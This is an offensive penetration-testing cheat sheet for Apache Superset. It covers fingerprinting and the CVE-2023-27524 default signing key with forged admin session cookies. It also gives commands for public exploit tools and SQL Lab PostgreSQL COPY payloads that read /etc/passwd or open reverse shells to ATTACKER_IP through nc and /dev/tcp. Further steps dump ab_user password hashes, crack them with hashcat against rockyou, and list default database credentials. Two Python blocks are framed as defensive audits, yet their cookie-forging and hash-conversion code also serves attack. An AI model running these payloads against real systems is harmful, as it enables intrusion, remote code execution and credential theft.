Data visualization and BI platform. Often runs on Werkzeug/Python.
Default Port: 8088
# Nmap
nmap -sV -p 8088 TARGET
# Indicators
# - Server header: Werkzeug/x.x.x Python/x.x.x
# - Title: "Superset"
# - Redirect to /login/
# - Endpoints: /health, /ping, /healthcheck

Common Endpoints:
/login/
/superset/welcome/
/superset/sqllab/
/superset/explore/
/health
/ping
/healthcheck
Affects: Apache Superset < 2.1.0
Superset uses Flask session cookies signed with a SECRET_KEY. Many instances use the default key, allowing attackers to forge admin session cookies.
Default SECRET_KEY (as bytes):
b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h'
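An added, pure-standard-library audit check, not code from this page or from the horizon3/jakabakos tools: it tells you whether a session cookie issued by your own Superset verifies under the shipped default key, which is the exposure CVE-2023-27524 describes. It re-implements the signing scheme Flask configures on itsdangerous (salt "cookie-session", HMAC key derivation, SHA-1, URL-safe unpadded base64). The session contents, the timestamp, the "rotated" comparison key and the fixture builder are constructed for the example.

```python
import base64
import binascii
import hashlib
import hmac
import json
import struct
import time
import zlib

# Default key from superset/config.py as bytes: '\e', '\y' and '\h' are not
# Python escapes, so each survives as a backslash plus the letter.
DEFAULT_SUPERSET_SECRET_KEY = b"\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h"
COOKIE_SALT = b"cookie-session"  # salt used by Flask's SecureCookieSessionInterface


def _b64e(raw: bytes) -> str:
    """URL-safe base64 without '=' padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signature(secret_key: bytes, signed_value: bytes) -> bytes:
    # itsdangerous key_derivation="hmac": key = HMAC-SHA1(secret, salt); the
    # cookie signature is then HMAC-SHA1(key, "<payload>.<timestamp>").
    derived = hmac.new(secret_key, COOKIE_SALT, hashlib.sha1).digest()
    return hmac.new(derived, signed_value, hashlib.sha1).digest()


def cookie_signed_with(cookie: str, secret_key: bytes) -> bool:
    """True only if the cookie's signature verifies under secret_key."""
    try:
        payload, ts, sig = cookie.rsplit(".", 2)
        given = _b64d(sig)
    except (ValueError, binascii.Error):  # wrong shape or invalid base64
        return False
    expected = _signature(secret_key, f"{payload}.{ts}".encode())
    return hmac.compare_digest(expected, given)


def decode_session_payload(cookie: str) -> dict:
    """Decode the payload (optionally zlib-compressed compact JSON). The
    payload is signed, not encrypted, so this needs no key at all."""
    payload = cookie.rsplit(".", 2)[0]
    compressed = payload.startswith(".")
    raw = _b64d(payload[1:] if compressed else payload)
    return json.loads(zlib.decompress(raw) if compressed else raw)


def audit_cookie(cookie: str) -> dict:
    """Report whether a cookie from your own instance verifies under the
    default key (CVE-2023-27524 exposure) and which user id it carries."""
    try:
        session = decode_session_payload(cookie)
    except (ValueError, zlib.error):
        session = {}
    if not isinstance(session, dict):
        session = {}
    return {
        "default_secret_key": cookie_signed_with(cookie, DEFAULT_SUPERSET_SECRET_KEY),
        "user_id": session.get("_user_id"),
    }


def make_fixture_cookie(session: dict, secret_key: bytes, issued_at: int) -> str:
    """Serialise a session the way Flask does; used here only to construct
    offline test input for the audit functions above."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    packed = zlib.compress(raw)
    payload = "." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    ts_b64 = _b64e(struct.pack(">Q", issued_at).lstrip(b"\0"))
    signed = f"{payload}.{ts_b64}"
    return f"{signed}.{_b64e(_signature(secret_key, signed.encode()))}"


if __name__ == "__main__":
    # Constructed session dict (the shape Flask-Login stores), signed with the default key.
    cookie = make_fixture_cookie({"_user_id": 1, "user_id": 1}, DEFAULT_SUPERSET_SECRET_KEY, int(time.time()))
    print(audit_cookie(cookie))  # {'default_secret_key': True, 'user_id': 1}
```

Run `audit_cookie` on the `session` cookie your instance sets on an unauthenticated request to /login/; that is the same test the horizon3 checker performs. A `default_secret_key: True` result means any user's session can be minted by a third party, and the remediation is a unique `SECRET_KEY` in superset_config.py (rotating it invalidates every existing session, which is what you want here).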
git clone https://github.com/horizon3ai/CVE-2023-27524.git
cd CVE-2023-27524
python3 CVE-2023-27524.py --url http://TARGET:8088

Output:
Superset Version: 1.4.0
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0...
git clone https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE.git
cd CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE
# Enumerate databases
python3 exploit.py -u http://TARGET:8088 --enum-dbs
# Attempt reverse shell
python3 exploit.py -u http://TARGET:8088 --revshell ATTACKER_IP:PORT

Use the forged cookie in browser:
- Open DevTools → Application → Cookies
- Replace the session cookie value with the forged cookie
- Refresh page → Logged in as admin
Once authenticated, access SQL Lab at /superset/sqllab/
Read Local Files (PostgreSQL backend; COPY FROM a file needs superuser or the pg_read_server_files role):
CREATE TABLE read_files(output text);
COPY read_files FROM '/etc/passwd';
SELECT * FROM read_files;

Reverse Shell (COPY ... PROGRAM needs superuser or the pg_execute_server_program role; a least-privilege SQL Lab database user has neither):
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f';

Alternative RCE:
COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"';

Config and Data Files:
/home/*/superset/docker/.env # Docker environment
/home/*/.superset/superset.db # SQLite database with user hashes
/app/superset_config.py # Main config
# SQLite database location
/home/tom/.superset/superset.db
# Query for users
sqlite3 superset.db "SELECT username, password FROM ab_user;"

Hash Format (Werkzeug PBKDF2-SHA256, as stored in ab_user.password):
pbkdf2:sha256:150000$wp3NugwQ$7e09694d2b07c70a67b7817dee361e8e06191f50f04163c37aa01bea24ec94f1
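An added example, not from this page or from Superset itself, that ties the two steps above together: it runs the same `SELECT username, password FROM ab_user` against a constructed in-memory stand-in for superset.db, parses the Werkzeug hash format shown, verifies a candidate password the way werkzeug.security.check_password_hash does, flags accounts whose hashes were produced with an iteration count below a policy floor, and emits the string hashcat mode 10900 actually expects (base64 of the salt and base64 of the raw digest, not the hex). The users, passwords, the second salt and the 600,000-iteration floor (OWASP's current PBKDF2-HMAC-SHA256 guidance) are assumptions of the example.

```python
import base64
import hashlib
import hmac
import sqlite3

MIN_ITERATIONS = 600_000  # assumed policy floor (OWASP guidance for PBKDF2-HMAC-SHA256)


def parse_werkzeug_pbkdf2(stored: str) -> tuple:
    """'pbkdf2:sha256:150000$SALT$HEX' -> (digest_name, iterations, salt, hexdigest)."""
    method, salt, hexdigest = stored.split("$", 2)
    scheme, digest_name, iterations = method.split(":")
    if scheme != "pbkdf2":
        raise ValueError(f"not a Werkzeug pbkdf2 hash: {stored[:16]}...")
    return digest_name, int(iterations), salt, hexdigest


def check_password(stored: str, candidate: str) -> bool:
    """Same computation werkzeug.security.check_password_hash does for pbkdf2 hashes."""
    digest_name, iterations, salt, hexdigest = parse_werkzeug_pbkdf2(stored)
    derived = hashlib.pbkdf2_hmac(digest_name, candidate.encode(), salt.encode(), iterations)
    return hmac.compare_digest(derived.hex(), hexdigest)


def to_hashcat_10900(stored: str) -> str:
    """hashcat -m 10900 line: sha256:ITER:base64(salt):base64(raw digest)."""
    digest_name, iterations, salt, hexdigest = parse_werkzeug_pbkdf2(stored)
    salt_b64 = base64.b64encode(salt.encode()).decode("ascii")
    hash_b64 = base64.b64encode(bytes.fromhex(hexdigest)).decode("ascii")
    return f"{digest_name}:{iterations}:{salt_b64}:{hash_b64}"


def make_werkzeug_hash(password: str, salt: str, iterations: int) -> str:
    """Fixture generator producing Werkzeug's pbkdf2:sha256 storage format."""
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2:sha256:{iterations}${salt}${derived.hex()}"


def fixture_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for ~/.superset/superset.db (minimal ab_user)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ab_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO ab_user (username, password) VALUES (?, ?)",
        [
            ("admin", make_werkzeug_hash("Winter2024!", "wp3NugwQ", 150_000)),    # legacy count
            ("analyst", make_werkzeug_hash("correct horse", "Z9q1aBcd", 600_000)),
        ],
    )
    return con


def audit_users(con: sqlite3.Connection) -> list:
    """Per-user hash parameters from ab_user, flagging weak iteration counts."""
    report = []
    for username, stored in con.execute("SELECT username, password FROM ab_user ORDER BY id"):
        digest_name, iterations, _, _ = parse_werkzeug_pbkdf2(stored)
        report.append({
            "username": username,
            "digest": digest_name,
            "iterations": iterations,
            "below_policy": iterations < MIN_ITERATIONS,
        })
    return report


if __name__ == "__main__":
    con = fixture_db()
    for row in audit_users(con):
        print(row)
    admin_hash = con.execute("SELECT password FROM ab_user WHERE username = 'admin'").fetchone()[0]
    print(to_hashcat_10900(admin_hash))
```

To audit a live metadata database, replace `sqlite3.connect(":memory:")` with the real superset.db path and drop the fixture inserts; accounts reported `below_policy` are the ones to re-hash, for example by forcing a password reset after raising the iteration count.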
Convert to hashcat format (mode 10900 expects sha256:ITER:base64(SALT):base64(raw digest), so the salt must be base64-encoded and the hex digest decoded to bytes before it is base64-encoded):
pbkdf2:sha256:150000$SALT$HASH
→
sha256:150000:base64(SALT):base64(unhex(HASH))
# Hashcat mode 10900 (PBKDF2-HMAC-SHA256)
SALT='wp3NugwQ'
HEX='7e09694d2b07c70a67b7817dee361e8e06191f50f04163c37aa01bea24ec94f1'
hashcat -m 10900 -a 0 "sha256:150000:$(printf '%s' "$SALT" | base64):$(printf '%s' "$HEX" | xxd -r -p | base64)" /usr/share/wordlists/rockyou.txt

If you have access to SQL Lab, database credentials are visible in the connection settings or can be extracted:
-- In SQL Lab, check connection string
-- Usually format: postgresql+psycopg2://USER:PASS@HOST:PORT/DBNAME

Common default connection:
Host: 127.0.0.1:5432
User: dbuser / superset
Pass: dbpass / superset
DB: employees / superset